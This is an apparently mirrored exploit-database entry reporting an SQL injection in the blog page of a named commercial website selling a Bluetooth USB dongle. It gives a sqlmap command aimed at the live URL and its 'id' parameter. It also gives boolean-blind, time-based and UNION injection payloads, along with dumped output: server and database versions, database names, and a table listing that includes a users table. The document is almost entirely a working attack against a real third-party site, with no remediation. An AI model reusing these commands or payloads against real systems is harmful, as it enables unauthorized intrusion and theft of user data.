Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021070126

Below is a copy:

Bluetooth Low Energy (BLE) USB Dongle | SQL Injection
# Exploit Title: BleuIO - Bluetooth Low Energy (BLE) USB Dongle | SQL Injection Vulnerability
# Author:  
# Tested On: Kali Linux
# sqlmap -u "https://www.bleuio.com/blog/details.php?id=932" --dbs --batch
---------------------------------------------------------------------------------------------------

.com Commercial

BleuIO - Bluetooth Low Energy (BLE) USB Dongle

https://www.bleuio.com/blog/details.php?id=932

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=932 AND 4987=4987

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=932 AND (SELECT 7660 FROM (SELECT(SLEEP(5)))zddA)

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=-6397 UNION ALL SELECT NULL,NULL,CONCAT(0x716b787671,0x745168597449744c6279465a6a574f7a7846646c686148795171645856615567797a70544e41764f,0x7176707a71),NULL,NULL-- -
---
the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
the back-end DBMS operating system: Linux Ubuntu
the back-end DBMS: MySQL >= 5.0.12
banner: '5.7.33-0ubuntu0.18.04.1'

available databases [3]:
[+] information_schema
[+] smart_db05
[+] test

Database: smart_db05
[24 tables]
+----------------------------+
| ssd_aiowps_events          |
| ssd_aiowps_failed_logins   |
| ssd_aiowps_global_meta     |
| ssd_aiowps_login_activity  |
| ssd_aiowps_login_lockdown  |
| ssd_aiowps_permanent_block |
| ssd_commentmeta            |
| ssd_comments               |
| ssd_links                  |
| ssd_options                |
| ssd_postmeta               |
| ssd_posts                  |
| ssd_redirection_404        |
| ssd_redirection_groups     |
| ssd_redirection_items      |
| ssd_redirection_logs       |
| ssd_term_relationships     |
| ssd_term_taxonomy          |
| ssd_termmeta               |
| ssd_terms                  |
| ssd_usermeta               |
| ssd_users                  |
| ssd_yoast_seo_links        |
| ssd_yoast_seo_meta         |
+----------------------------+

Database: smart_db05
Table: ssd_users
[1 entry]

Copyright ©2021 Exploitalert.
